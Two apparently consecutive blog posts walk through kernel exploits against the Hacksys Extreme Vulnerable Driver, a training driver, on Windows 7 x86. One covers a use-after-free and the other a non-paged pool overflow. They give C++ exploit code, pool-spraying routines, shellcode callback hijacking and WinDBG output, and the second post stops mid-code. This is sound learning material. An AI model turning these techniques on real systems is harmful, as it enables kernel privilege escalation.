
HEVD Exploits – Windows 7 x86 Use-After-Free

By: h0mbre
23 April 2020 at 04:00

Introduction

Continuing on with my goal to develop exploits for the Hacksys Extreme Vulnerable Driver, I will be using HEVD 2.0. There are a ton of good blog posts out there walking through various HEVD exploits. I recommend you read them all! I referenced them heavily as I tried to complete these exploits. Almost nothing I do or say in this blog will be new or my own thoughts/ideas/techniques. There were instances where I diverged from the strategies I saw employed in those blog posts, either out of necessity or simply to try my own thing and learn more.

This series will be light on tangential information such as:

  • how drivers work, the different types, communication between userland, the kernel, and drivers, etc.
  • how to install HEVD
  • how to set up a lab environment
  • shellcode analysis

The reason for this is simple: the other blog posts do a much better job detailing this information than I could ever hope to. It already feels silly writing this blog series knowing that there are far superior posts out there; I will not make it even sillier by shoddily re-explaining these things at a high level. Those authors have way more experience and far superior knowledge, so I will let them do the explaining. :)

This post/series will instead focus on my experience trying to craft the actual exploits.

Thanks

UAF Setup

I’ve never exploited a use-after-free bug on any system before. I only vaguely understood the concept before starting this exercise. We need what, in my noob opinion, seems like quite a lot of primitives in order to make this work. Obviously HEVD goes out of its way to be vulnerable in precisely the correct way for us to get an exploit working, which is perfect for me since I have no experience with this bug class and we’re just here to learn. I feel like, although we have to utilize multiple driver functions via IOCTL, this is actually a simpler exploit to pull off than the pool overflow that we just did.

Also, I wanted to do this on 64-bit; however, most of the strategies I saw outlined required NtQuerySystemInformation, which as far as I know requires your process to be elevated to an extent, so I wanted to avoid that. On 64-bit, the pool header structure also grows from 0x8 bytes to 0x10 bytes, which makes exploitation more cumbersome; however, there are some good walkthroughs out there about how to accomplish this. For now, let’s stick to x86.

What do we need in order to exploit a use-after-free bug? Well, after doing this exercise, it seems like we need to be able to do the following:

  • allocate an object in the non-paged pool,
  • a mechanism that creates a reference to the object as a global variable, i.e., if our object is allocated at 0xFFFFFFFF, there is some variable out there in the program that stores that address for later use,
  • the ability to free the memory and not have the previously established reference NULLed out, i.e., when the chunk is freed the program author doesn’t set reference = NULL,
  • the ability to create “fake” objects that have the same size and controllable contents in the non-paged pool,
  • the ability to spray the non-paged pool and create perfectly sized holes so that our UAF and fake objects can be fitted in our created holes,
  • finally, the ability to use the no-longer valid reference to our freed chunk.

Allocating the UAF Object in the Pool

Let’s take a look at the UAF object allocation routine in the driver in IDA.

It may not be immediately clear what’s going on without stepping through the routine in the debugger but we actually have very little control over what is taking place here. I’ve created a small skeleton exploit code and set a breakpoint towards the start of the routine. Here is our code at the moment:

#include <iostream>
#include <Windows.h>

using namespace std;

#define DEVICE_NAME             "\\\\.\\HackSysExtremeVulnerableDriver"
#define ALLOCATE_UAF_IOCTL      0x222013
#define FREE_UAF_IOCTL          0x22201B
#define FAKE_OBJECT_IOCTL       0x22201F
#define USE_UAF_IOCTL           0x222017

HANDLE grab_handle() {

    HANDLE hFile = CreateFileA(DEVICE_NAME,
        FILE_READ_ACCESS | FILE_WRITE_ACCESS,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        FILE_FLAG_OVERLAPPED | FILE_ATTRIBUTE_NORMAL,
        NULL);

    if (hFile == INVALID_HANDLE_VALUE) {
        cout << "[!] No handle to HackSysExtremeVulnerableDriver\n";
        exit(1);
    }

    cout << "[>] Grabbed handle to HackSysExtremeVulnerableDriver: " << hex
        << hFile << "\n";

    return hFile;
}

void create_UAF_object(HANDLE hFile) {

    BYTE input_buffer[] = "\x00";

    DWORD bytes_ret = 0x0;

    int result = DeviceIoControl(hFile,
        ALLOCATE_UAF_IOCTL,
        input_buffer,
        sizeof(input_buffer),
        NULL,
        0,
        &bytes_ret,
        NULL);
}


int main() {

    HANDLE hFile = grab_handle();

    create_UAF_object(hFile);

    return 0;
}

You can see from the IDA screenshot that after the call to ExAllocatePoolWithTag, eax is placed in esi; this is about where I’ve placed the breakpoint. We can then take the value in esi, which should be a pointer to our allocation, and go see what the allocation will look like after the subsequent memset operation completes. We can see some static values as well, such as what appears to be the size of the allocation (0x58), which we know from our last post is actually undersold by 0x8 since we also have to account for the pool header, so our real allocation size in the pool is 0x60 bytes.

So we hit our breakpoint after ExAllocatePoolWithTag and then I just stepped through until the memset completed.

Right after the memset completed, we look up our object in the pool and see that it’s mostly been filled with A characters, except that the first DWORD value has been left NULL. After stepping through the next two instructions:

We can see that the DWORD value has been filled and also that a null terminator has been added to the last byte of our allocation. This DWORD is the UaFObjectCallback, a function pointer for a callback that gets used during a separate routine.

And lastly in the screenshot we can see the routine move esi, which is the location of our allocation, into the global variable g_UseAfterFreeObject. This is important because this is what makes this code vulnerable, as this same variable will not be nulled out when the object is freed.
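
Putting the debugger observations together, the object the driver allocates can be pictured roughly like this (a reconstruction from the output above, not HEVD’s literal source; the struct name is mine):

typedef struct _UAF_OBJECT {
    PVOID Callback;      // UaFObjectCallback, called later by the "use" IOCTL routine
    CHAR  Buffer[0x54];  // filled with 'A' characters, last byte null-terminated by the driver
} UAF_OBJECT;            // 0x58 bytes requested; 0x60 in the pool once the 0x8 header is added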

Freeing the UAF Object

Now, let’s try interacting with the driver routine which allows us to free our object.

Not a whole lot here, but we can see that there is no effort made to NULL the global variable g_UseAfterFreeObject. You can see that even after we run the routine, the variable still holds the address of our freed allocation:

Allocating a Fake Object

Now let’s see how much freedom we have to allocate arbitrary objects in the non-paged pool. Looking at the function, it uses the same APIs we’re familiar with, does a probe for read to make sure the buffer is in user land (I think?), and then builds our chunk to our specifications.

I just sent a buffer of size 0x58 filled with A characters for testing. It even appends a null terminator to the end like the real UAF object allocator, but we control the contents of this one. This is good since we’ll have full control over the pointer value at the start of the chunk that serves as the callback function pointer.

Executing UAF Object Callback

This is where the “use” portion of “Use-After-Free” comes in. There is a driver routine that allows us to take the address which holds the callback function pointer of the UAF object and then call the function there. We can see this in IDA.

We can see that as long as the value at [eax], which holds the address of our UAF object (or what used to be our UAF object before we freed it), is not NULL, we’ll go ahead and call the function pointer stored at that location (the callback function). Right now, if we called this, what would happen? Let’s see!

Looking up the memory address of what was our freed chunk we see that it is NOT NULL. We would actually call something, but the address that would be called is 0x852c22f0. Looking at that address, we see that there is just arbitrary code there.

This is not what we want. We want this to be predictable just like our last exploit. We want the freed address of our UAF object to be filled with our fake object, so when the function pointer at that address is called, it will be a pointer we control, our shellcode. To do this, our plan of attack is very similar to our last post. Please go through that exploit first!

Spraying the Non-Paged Pool

First things first, we need an object that fits our needs. Last post we used Event Objects, but this time around, since we need 0x60-sized chunks, we’ll be using IoCompletionReserve objects, which we can allocate with NtAllocateReserveObject (thanks blogpost authors).

We’ll do the same thing we did last time but spray some more. In my testing I found that I had to spray more to get the chunks sequential like we want:

  • defragment the pool with 10,000 objects
  • aim for some sequential/contiguous blocks of objects with another spray of 30,000 objects.

Next, we’ll want to poke holes in the contiguous block portion, remember? We’ll be collecting handles to these objects in vectors so that we can later free the ones we need to create the holes. The objects are already the perfect size, so we’ll just free every other handle in the contiguous block; that way, every hole created in our contiguous block will be surrounded on both sides by our objects. Let’s update our exploit code and test out the spray. Huge thanks to @tekwizz123 once again for showing in his exploit how to get NtAllocateReserveObject into the program; it would’ve taken me a long time to troubleshoot those compilation errors without his help. Our spray test code:

#include <iostream>
#include <vector>
#include <Windows.h>

using namespace std;

#define DEVICE_NAME             "\\\\.\\HackSysExtremeVulnerableDriver"
#define ALLOCATE_UAF_IOCTL      0x222013
#define FREE_UAF_IOCTL          0x22201B
#define FAKE_OBJECT_IOCTL       0x22201F
#define USE_UAF_IOCTL           0x222017

vector<HANDLE> defrag_handles;
vector<HANDLE> sequential_handles;

typedef struct _LSA_UNICODE_STRING {
    USHORT Length;
    USHORT MaximumLength;
    PWSTR Buffer;
} UNICODE_STRING;

typedef struct _OBJECT_ATTRIBUTES {
    ULONG Length;
    HANDLE RootDirectory;
    UNICODE_STRING* ObjectName;
    ULONG Attributes;
    PVOID SecurityDescriptor;
    PVOID SecurityQualityOfService;
} OBJECT_ATTRIBUTES;

#define POBJECT_ATTRIBUTES OBJECT_ATTRIBUTES*

typedef NTSTATUS(WINAPI* _NtAllocateReserveObject)(
    OUT PHANDLE hObject,
    IN POBJECT_ATTRIBUTES ObjectAttributes,
    IN DWORD ObjectType);

HANDLE grab_handle() {

    HANDLE hFile = CreateFileA(DEVICE_NAME,
        FILE_READ_ACCESS | FILE_WRITE_ACCESS,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        FILE_FLAG_OVERLAPPED | FILE_ATTRIBUTE_NORMAL,
        NULL);

    if (hFile == INVALID_HANDLE_VALUE) {
        cout << "[!] No handle to HackSysExtremeVulnerableDriver\n";
        exit(1);
    }

    cout << "[>] Grabbed handle to HackSysExtremeVulnerableDriver: " << hex
        << hFile << "\n";

    return hFile;
}

void create_UAF_object(HANDLE hFile) {

    cout << "[>] Creating UAF object...\n";
    BYTE input_buffer[] = "\x00";

    DWORD bytes_ret = 0x0;

    int result = DeviceIoControl(hFile,
        ALLOCATE_UAF_IOCTL,
        input_buffer,
        sizeof(input_buffer),
        NULL,
        0,
        &bytes_ret,
        NULL);

    if (!result) {

        cout << "[!] Could not create UAF object\n";
        cout << "[!] Last error: " << dec << GetLastError() << "\n";
        exit(1);
    }
    cout << "[>] UAF object allocated.\n";
}

void free_UAF_object(HANDLE hFile) {

    cout << "[>] Freeing UAF object...\n";
    BYTE input_buffer[] = "\x00";

    DWORD bytes_ret = 0x0;

    int result = DeviceIoControl(hFile,
        FREE_UAF_IOCTL,
        input_buffer,
        sizeof(input_buffer),
        NULL,
        0,
        &bytes_ret,
        NULL);

    if (!result) {

        cout << "[!] Could not free UAF object\n";
        cout << "[!] Last error: " << dec << GetLastError() << "\n";
        exit(1);
    }
    cout << "[>] UAF object freed.\n";
}

void allocate_fake_object(HANDLE hFile) {

    cout << "[>] Creating fake UAF object...\n";
    BYTE input_buffer[0x58] = { 0 };

    memset((void*)input_buffer, '\x41', 0x58);

    DWORD bytes_ret = 0x0;

    int result = DeviceIoControl(hFile,
        FAKE_OBJECT_IOCTL,
        input_buffer,
        sizeof(input_buffer),
        NULL,
        0,
        &bytes_ret,
        NULL);

    if (!result) {

        cout << "[!] Could not create fake UAF object\n";
        cout << "[!] Last error: " << dec << GetLastError() << "\n";
        exit(1);
    }
    cout << "[>] Fake UAF object created.\n";
}

void spray() {

    // thanks Tekwizz as usual
    _NtAllocateReserveObject NtAllocateReserveObject = 
        (_NtAllocateReserveObject)GetProcAddress(GetModuleHandleA("ntdll.dll"),
            "NtAllocateReserveObject");

    if (!NtAllocateReserveObject) {

        cout << "[!] Failed to get the address of NtAllocateReserve.\n";
        cout << "[!] Last error " << GetLastError() << "\n";
        exit(1);
    }

    cout << "[>] Spraying pool to defragment...\n";
    for (int i = 0; i < 10000; i++) {

        HANDLE hObject = 0x0;

        PHANDLE result = (PHANDLE)NtAllocateReserveObject((PHANDLE)&hObject,
            NULL,
            1); // specifies the correct object

        if (result != 0) {
            cout << "[!] Error allocating IoCo Object during defragmentation\n";
            exit(1);
        }
        defrag_handles.push_back(hObject);
    }
    cout << "[>] Defragmentation spray complete.\n";
    cout << "[>] Spraying sequential allocations...\n";
    for (int i = 0; i < 30000; i++) {

        HANDLE hObject = 0x0;

        PHANDLE result = (PHANDLE)NtAllocateReserveObject((PHANDLE)&hObject,
            NULL,
            1); // specifies the correct object

        if (result != 0) {
            cout << "[!] Error allocating IoCo Object during defragmentation\n";
            exit(1);
        }
        sequential_handles.push_back(hObject);
    }

    cout << "[>] Sequential spray complete.\n";

    cout << "[>] Poking 0x60 byte-sized holes in our sequential allocation...\n";
    for (int i = 0; i < sequential_handles.size(); i++) {
        if (i % 2 == 0) {
            BOOL freed = CloseHandle(sequential_handles[i]);
        }
    }
    cout << "[>] Holes poked lol.\n";
    cout << "[>] Some handles: " << hex << sequential_handles[29997] << "\n";
    cout << "[>] Some handles: " << hex << sequential_handles[29998] << "\n";
    cout << "[>] Some handles: " << hex << sequential_handles[29999] << "\n";

    Sleep(1000);
    DebugBreak();
}

int main() {

    HANDLE hFile = grab_handle();

    //create_UAF_object(hFile);

    //free_UAF_object(hFile);

    //allocate_fake_object(hFile);

    spray();

    return 0;
}

We can see after running this and looking at one of the handles we dumped to the terminal (thanks FuzzySec!) that we were able to get our pool looking the way we want: free 0x60-byte chunks surrounded by our IoCo objects.

kd> !handle 0x2724c

PROCESS 86974250  SessionId: 1  Cid: 1238    Peb: 7ffdf000  ParentCid: 1554
    DirBase: bf5d4fc0  ObjectTable: abb08b80  HandleCount: 25007.
    Image: HEVDUAF.exe

Handle table at 89f1f000 with 25007 entries in use

2724c: Object: 8543b6d0  GrantedAccess: 000f0003 Entry: 88415498
Object: 8543b6d0  Type: (84ff1a88) IoCompletionReserve
    ObjectHeader: 8543b6b8 (new version)
        HandleCount: 1  PointerCount: 1


kd> !pool 8543b6d0 
Pool page 8543b6d0 region is Nonpaged pool
 8543b000 size:   60 previous size:    0  (Allocated)  IoCo (Protected)
 8543b060 size:   38 previous size:   60  (Free)       `.C.
 8543b098 size:   20 previous size:   38  (Allocated)  ReTa
 8543b0b8 size:   28 previous size:   20  (Allocated)  FSro
 8543b0e0 size:  500 previous size:   28  (Free)       Io  
 8543b5e0 size:   60 previous size:  500  (Allocated)  IoCo (Protected)
 8543b640 size:   60 previous size:   60  (Free)       IoCo
*8543b6a0 size:   60 previous size:   60  (Allocated) *IoCo (Protected)
		Owning component : Unknown (update pooltag.txt)
 8543b700 size:   60 previous size:   60  (Free)       IoCo
 8543b760 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543b7c0 size:   60 previous size:   60  (Free)       IoCo
 8543b820 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543b880 size:   60 previous size:   60  (Free)       IoCo
 8543b8e0 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543b940 size:   60 previous size:   60  (Free)       IoCo
 8543b9a0 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543ba00 size:   60 previous size:   60  (Free)       IoCo
 8543ba60 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543bac0 size:   60 previous size:   60  (Free)       IoCo
 8543bb20 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543bb80 size:   60 previous size:   60  (Free)       IoCo
 8543bbe0 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543bc40 size:   60 previous size:   60  (Free)       IoCo
 8543bca0 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543bd00 size:   60 previous size:   60  (Free)       IoCo
 8543bd60 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543bdc0 size:   60 previous size:   60  (Free)       IoCo
 8543be20 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543be80 size:   60 previous size:   60  (Free)       IoCo
 8543bee0 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543bf40 size:   60 previous size:   60  (Free)       IoCo
 8543bfa0 size:   60 previous size:   60  (Allocated)  IoCo (Protected)

Executing Plan

Now that we’ve confirmed our heap spray works, the next step is to implement our game-plan. We want to:

  • spray the heap to get it like so ^^,
  • allocate our UAF object,
  • free our UAF object,
  • create our fake objects with malicious callback function pointers,
  • activate the callback function.

All we really need to do now is allocate the shellcode, get a pointer to it, place that pointer into our input buffer when we create our fake objects, and spray those fake objects into the holes we poked (around 15,000 of them).
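
As a rough sketch of that last step (assuming a shellcode byte array like the ones from the earlier posts, plus the hFile handle and IOCTL defines from the spray code above; this is not the verbatim final code), it looks something like this:

// Sketch only: stage the shellcode and point the first DWORD of the fake
// object (the callback pointer) at it, then spray fake objects into the holes.
LPVOID shellcode_ptr = VirtualAlloc(NULL,
    sizeof(shellcode),
    MEM_COMMIT | MEM_RESERVE,
    PAGE_EXECUTE_READWRITE);
memcpy(shellcode_ptr, shellcode, sizeof(shellcode));

BYTE fake_object[0x58];
memset(fake_object, '\x41', sizeof(fake_object));
memcpy(fake_object, &shellcode_ptr, sizeof(PVOID));  // callback pointer -> shellcode

DWORD bytes_ret = 0x0;
for (int i = 0; i < 15000; i++) {
    DeviceIoControl(hFile,
        FAKE_OBJECT_IOCTL,
        fake_object,
        sizeof(fake_object),
        NULL,
        0,
        &bytes_ret,
        NULL);
}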

When we run our final code, we get our system shell!

Complete exploit code.

Conclusion

That was a pretty exaggerated exploit scenario I would guess, but it was perfect for me since I had never done a UAF exploit before. Next we’ll be doing the stack overflow again but this time on Windows 10 where we’ll have to bypass SMEP. Until next time.

Once again, big thanks to all the content producers out there for getting me through these exploits.

HEVD Exploits – Windows 7 x86 Non-Paged Pool Overflow

By: h0mbre
22 April 2020 at 04:00

Introduction

Continuing on with my goal to develop exploits for the Hacksys Extreme Vulnerable Driver, I will be using HEVD 2.0. There are a ton of good blog posts out there walking through various HEVD exploits. I recommend you read them all! I referenced them heavily as I tried to complete these exploits. Almost nothing I do or say in this blog will be new or my own thoughts/ideas/techniques. There were instances where I diverged from the strategies I saw employed in those blog posts, either out of necessity or simply to try my own thing and learn more.

This series will be light on tangential information such as:

  • how drivers work, the different types, communication between userland, the kernel, and drivers, etc.
  • how to install HEVD
  • how to set up a lab environment
  • shellcode analysis

The reason for this is simple: the other blog posts do a much better job detailing this information than I could ever hope to. It already feels silly writing this blog series knowing that there are far superior posts out there; I will not make it even sillier by shoddily re-explaining these things at a high level. Those authors have way more experience and far superior knowledge, so I will let them do the explaining. :)

This post/series will instead focus on my experience trying to craft the actual exploits.

Thanks

This exploit required a lot of insight into the non-paged pool internals of Windows 7. These walkthroughs/blogs were extremely well written and made everything very logical and clear. I really appreciate the authors’ help! Again, I’m just recreating other people’s exploits in this series trying to learn, not inventing new ways to exploit pool overflows for 32-bit Windows 7. The exploit also requires allocating the NULL page, which isn’t possible on x64, so this will be a 32-bit exploit only.

Reversing Relevant Function

The bug in this driver routine is really similar to some of the stack-based buffer overflow vulnerabilities we’ve already done, like the stack overflow and the integer overflow. We send a user buffer to the routine, which allocates a kernel buffer and copies our user buffer into it. The only difference here is the type of memory used. Instead of the stack, this memory is allocated in the non-paged pool, which consists of pool chunks that are guaranteed to be in physical memory (RAM) at all times and cannot be paged out. This stands in contrast to the paged pool, which is allowed to be paged out to a secondary storage medium when RAM capacity runs short.

The APIs that are relevant in this routine are ExAllocatePoolWithTag and ExFreePoolWithTag. The prototype for ExAllocatePoolWithTag looks like this:

PVOID ExAllocatePoolWithTag(
  __drv_strictTypeMatch(__drv_typeExpr)POOL_TYPE PoolType,
  SIZE_T                                         NumberOfBytes,
  ULONG                                          Tag
);

In our routine all of these parameters are hardcoded for us. PoolType is set to NonPagedPool, NumberOfBytes is set to 0x1F8, and Tag is set to 0x6B636148 ('Hack'). This by itself is fine and there is obviously no vulnerability; however, the driver routine uses memcpy to transfer data from the user buffer to this newly allocated non-paged pool kernel buffer and uses the size of the user buffer as the size argument. (This is precisely the bug in the Jungo driver that @steventseeley discovered via fuzzing.) If the size of our user buffer is larger than the kernel buffer, we will overwrite some data in the adjacent non-paged pool. Here is a screenshot of the function in IDA Free 7.0.

Nothing too complicated reversing wise, we can even see that right after our pool buffer is allocated, it is de-allocated with ExFreePoolWithTag.
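
Paraphrased, the routine boils down to this pattern (a sketch of the decompiled logic, not the driver's literal source; UserBuffer and Size stand for the buffer and length the IOCTL caller supplies):

// Fixed-size non-paged pool buffer, attacker-controlled copy length.
PVOID KernelBuffer = ExAllocatePoolWithTag(NonPagedPool, 0x1F8, 0x6B636148); // 'Hack'
memcpy(KernelBuffer, UserBuffer, Size);       // Size comes straight from the caller
ExFreePoolWithTag(KernelBuffer, 0x6B636148);  // freed again right after the copy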

If we call the function with the following skeleton code, we will see in WinDBG that everything works as normal and we can start trying to understand how the pool chunks are structured.

#include <iostream>
#include <Windows.h>

using namespace std;

#define DEVICE_NAME         "\\\\.\\HackSysExtremeVulnerableDriver"
#define IOCTL               0x22200F


HANDLE grab_handle() {

    HANDLE hFile = CreateFileA(DEVICE_NAME,
        FILE_READ_ACCESS | FILE_WRITE_ACCESS,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        FILE_FLAG_OVERLAPPED | FILE_ATTRIBUTE_NORMAL,
        NULL);

    if (hFile == INVALID_HANDLE_VALUE) {
        cout << "[!] No handle to HackSysExtremeVulnerableDriver\n";
        exit(1);
    }

    cout << "[>] Grabbed handle to HackSysExtremeVulnerableDriver: " << hex
        << hFile << "\n";

    return hFile;
}

void send_payload(HANDLE hFile) {

    ULONG payload_len = 0x1F8;

    LPVOID input_buff = VirtualAlloc(NULL,
        payload_len + 0x1,
        MEM_RESERVE | MEM_COMMIT,
        PAGE_EXECUTE_READWRITE);

    memset(input_buff, '\x42', payload_len);

    cout << "[>] Sending buffer size of: " << dec << payload_len << "\n";

    DWORD bytes_ret = 0;

    int result = DeviceIoControl(hFile,
        IOCTL,
        input_buff,
        payload_len,
        NULL,
        0,
        &bytes_ret,
        NULL);

    if (!result) {

        cout << "[!] DeviceIoControl failed!\n";

    }
}

int main() {

    HANDLE hFile = grab_handle();

    send_payload(hFile);

    return 0;
}

I set a breakpoint at offset 0x4D64 with this command in WinDBG: bp !HEVD+4D64, which is right after the memcpy operation, and we see that our pool buffer has been filled with our \x42 characters. At this point a pointer to the allocated kernel buffer is still in eax, so we can go to that location with the !pool command, which starts at the beginning of that page of memory and displays certain aspects of the memory allocated there.

kd> !pool 85246430
Pool page 85246430 region is Nonpaged pool
 85246000 size:   c8 previous size:    0  (Allocated)  Ntfx
 852460c8 size:   10 previous size:   c8  (Free)       .PZH
 852460d8 size:   20 previous size:   10  (Allocated)  ReTa
 852460f8 size:   20 previous size:   20  (Allocated)  ReTa
 85246118 size:   48 previous size:   20  (Allocated)  Vad 
 85246160 size:   68 previous size:   48  (Allocated)  NpFn Process: 8507a030
 852461c8 size:   20 previous size:   68  (Allocated)  ReTa
 852461e8 size:   20 previous size:   20  (Allocated)  ReTa
 85246208 size:  168 previous size:   20  (Free)       CcSc
 85246370 size:   b8 previous size:  168  (Allocated)  NbtD
*85246428 size:  200 previous size:   b8  (Allocated) *Hack
		Owning component : Unknown (update pooltag.txt)
 85246628 size:   20 previous size:  200  (Allocated)  ReTa
 85246648 size:   68 previous size:   20  (Allocated)  FMsl
 852466b0 size:   c8 previous size:   68  (Allocated)  Ntfx
 85246778 size:  180 previous size:   c8  (Free)       EtwG
 852468f8 size:   98 previous size:  180  (Allocated)  MmCa
 85246990 size:    8 previous size:   98  (Free)       Nb29
 85246998 size:   48 previous size:    8  (Allocated)  Vad 
 852469e0 size:  1b8 previous size:   48  (Allocated)  LSbf
 85246b98 size:   b8 previous size:  1b8  (Allocated)  File (Protected)
 85246c50 size:   60 previous size:   b8  (Free)       Clfs
 85246cb0 size:  1b0 previous size:   60  (Allocated)  NSIk
 85246e60 size:   20 previous size:  1b0  (Allocated)  ReTa
 85246e80 size:   b8 previous size:   20  (Allocated)  File (Protected)
 85246f38 size:   c8 previous size:   b8  (Allocated)  Ntfx

We see that even though the pointer to our kernel buffer in eax was 0x85246430, the allocation actually begins at 0x85246428, which is 0x8 before. This is because a 4-byte ULONG value and our 4-byte pool tag are placed before our actual buffer begins. Using some of the commands from the aforementioned blogposts in WinDBG goes a long way toward being able to think clearly about these data structures.

kd> dt nt!_POOL_HEADER 85246428
   +0x000 PreviousSize     : 0y000010111 (0x17)
   +0x000 PoolIndex        : 0y0000000 (0)
   +0x002 BlockSize        : 0y001000000 (0x40)
   +0x002 PoolType         : 0y0000010 (0x2)
   +0x000 Ulong1           : 0x4400017
   +0x004 PoolTag          : 0x6b636148
   +0x004 AllocatorBackTraceIndex : 0x6148
   +0x006 PoolTagHash      : 0x6b63

This shows us the makeup of the pool header. We can see it spans 8 total bytes, which we knew. The numbers that begin with 0y are binary. You can see that PreviousSize, PoolIndex, BlockSize, and PoolType all get their values smushed together to form the Ulong1 member, which begins at offset 0x000. Then, at offset 0x004, we get our pool tag. So that’s all 8 bytes accounted for. We can use the memory pane to scroll to the bottom of our buffer and spy on the next memory chunk’s header as well.

We can see that the header values for the next chunk are: 40 00 04 04 52 65 54 61.

The only other thing to pay attention to was that the !pool command told us our chunk was 0x200 bytes long, which makes sense when you add the size of the header (0x8) to our allocated buffer size of 0x1F8.
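
For reference, the 8-byte x86 pool header we keep seeing can be pictured as a struct like this (a sketch matching the dt output above; the two size fields count 8-byte blocks, so BlockSize 0x40 corresponds to our 0x200-byte chunk):

typedef struct _POOL_HEADER_X86 {
    union {
        struct {
            USHORT PreviousSize : 9;  // previous chunk's size in 8-byte blocks (0x17 * 8 = 0xB8)
            USHORT PoolIndex    : 7;
            USHORT BlockSize    : 9;  // this chunk's size in 8-byte blocks (0x40 * 8 = 0x200)
            USHORT PoolType     : 7;
        };
        ULONG Ulong1;                 // 0x4400017 in the example above
    };
    ULONG PoolTag;                    // 0x6b636148 == 'Hack'
} POOL_HEADER_X86;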

Generic Attack Strategy

Before we proceed, we have to understand how we’re going to utilize this ability, via our oversized user buffer, to arbitrarily overwrite data in the adjacent pool allocation as an attack vector. What we have right now is the ability to overwrite pool memory. In order for this to be worthwhile for us, we have to find a way to get the pool into a state where what we’re overwriting is predictable. If what we’re overwriting is unpredictable, we can never form a reliable exploit. And if we damage some of the fields here and aren’t surgical in our overwrites, we’ll easily get a BSOD.

Generically, in its organic state, the non-paged pool is fragmented, meaning there are holes in it from chunks being freed arbitrarily by other processes on the system. What we want to do is cover these holes by spraying a ton of objects into the non-paged pool so that the pool allocation mechanism places our chunks into those available slots. Once this is complete, we’ll want to spray even more objects so that by far, the most common objects in the pool are the ones we have just sprayed.

By way of analogy, if you had a bag of a chess set’s pieces, you would have low odds of pulling a King from the bag; however, if you then added 15,000 Kings to the bag, your chances are much better!

So we have two goals outlined so far:

  • spray the pool with objects until its organically existing holes are patched with our objects,
  • spray the pool again to increase the sheer number of objects we’ve allocated so that they’ll be sequential in non-paged pool memory.

What we’ll do next is take our pretty pool allocations that form a large solid block and poke holes in it the size of the kernel buffer we can allocate with the driver routine. Our kernel buffer is 0x200 bytes, remember. This way, when our kernel buffer is allocated in the pool, the allocator will place it in the newly freed 0x200-byte hole we have just created. Now what we have is our allocation completely surrounded by the objects we sprayed. This is perfect because now when our buffer overwrites data in the adjacent pool allocation, we’ll know exactly what we’re overwriting, because it will be a chunk that we allocated ourselves, not one belonging to an arbitrary system process.

We will use this ability to predictably overwrite a piece of data in one of our allocated objects that will, once the allocation is freed, end up with the kernel executing a function pointer that we control and will have pointed at our shellcode. So now our generic gameplan is:

  • spray the pool with objects until its organically existing holes are patched with our objects,
  • spray the pool again to increase the sheer number of objects we’ve allocated so that they’ll be sequential in non-paged pool memory,
  • poke some nice 0x200 byte-sized holes in the allocations,
  • use our driver routine to fit our kernel buffer in one of these new holes,
  • have that allocation predictably overwrite information in the adjacent allocation that leads to kernel execution of our shellcode when the corrupted allocation is freed.

Next, we’ll get to know the object we’ll be using to spray the pool.

Event Objects

The blogpost authors inform us that Event Objects are perfect for this job for a few reasons, but one of the main reasons is that it is 0x40 bytes in size. A quick Python interpreter check shows us that we can neatly free 8 Event Objects and have our 0x200 byte sized holes we wanted.

>>> 0x200 % 0x40
0
>>> 0x200 / 0x40
8.0

We don’t care much about the content of these events, so every parameter will be basically NULL when we use the CreateEvent API:

HANDLE CreateEventA(
  LPSECURITY_ATTRIBUTES lpEventAttributes,
  BOOL                  bManualReset,
  BOOL                  bInitialState,
  LPCSTR                lpName
);

What’s most important for us now is finding out what we need to overwrite in this object to get code execution when the corrupted Event Object is freed. We’ll go ahead and spray a similar number of objects to what FuzzySec and r0otki7 did:

  • 10,000 to fill the holes in the fragmented pool
  • 5,000 to create a nice long contiguous block of Event Objects

Our code now looks like this:

#include <iostream>
#include <vector>
#include <Windows.h>

using namespace std;

#define DEVICE_NAME         "\\\\.\\HackSysExtremeVulnerableDriver"
#define IOCTL               0x22200F

vector<HANDLE> defragment_handles;
vector<HANDLE> sequential_handles;

HANDLE grab_handle() {

    HANDLE hFile = CreateFileA(DEVICE_NAME,
        FILE_READ_ACCESS | FILE_WRITE_ACCESS,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        FILE_FLAG_OVERLAPPED | FILE_ATTRIBUTE_NORMAL,
        NULL);

    if (hFile == INVALID_HANDLE_VALUE) {
        cout << "[!] No handle to HackSysExtremeVulnerableDriver\n";
        exit(1);
    }

    cout << "[>] Grabbed handle to HackSysExtremeVulnerableDriver: " << hex
        << hFile << "\n";

    return hFile;
}

void spray_pool() {

    cout << "[>] Spraying pool to defragment...\n";
    for (int i = 0; i < 10000; i++) {

        HANDLE result = CreateEvent(NULL,
            0,
            0,
            L"");

        if (!result) {
            cout << "[!] Error allocating Event Object during defragmentation\n";
            exit(1);
        }

        defragment_handles.push_back(result);
    }
    cout << "[>] Defragmentation spray complete.\n";
    cout << "[>] Spraying sequential allocations...\n";
    for (int i = 0; i < 10000; i++) {

        HANDLE result = CreateEvent(NULL,
            0,
            0,
            L"");

        if (!result) {
            cout << "[!] Error allocating Event Object during sequential.\n";
            exit(1);
        }

        sequential_handles.push_back(result);
    }
    
    cout << "[>] Sequential spray complete.\n";
}

void send_payload(HANDLE hFile) {
    
    ULONG payload_len = 0x1F8;

    LPVOID input_buff = VirtualAlloc(NULL,
        payload_len + 0x1,
        MEM_RESERVE | MEM_COMMIT,
        PAGE_EXECUTE_READWRITE);

    memset(input_buff, '\x42', payload_len);

    cout << "[>] Sending buffer size of: " << dec << payload_len << "\n";

    DWORD bytes_ret = 0;

    int result = DeviceIoControl(hFile,
        IOCTL,
        input_buff,
        payload_len,
        NULL,
        0,
        &bytes_ret,
        NULL);

    if (!result) {

        cout << "[!] DeviceIoControl failed!\n";

    }
}

int main() {

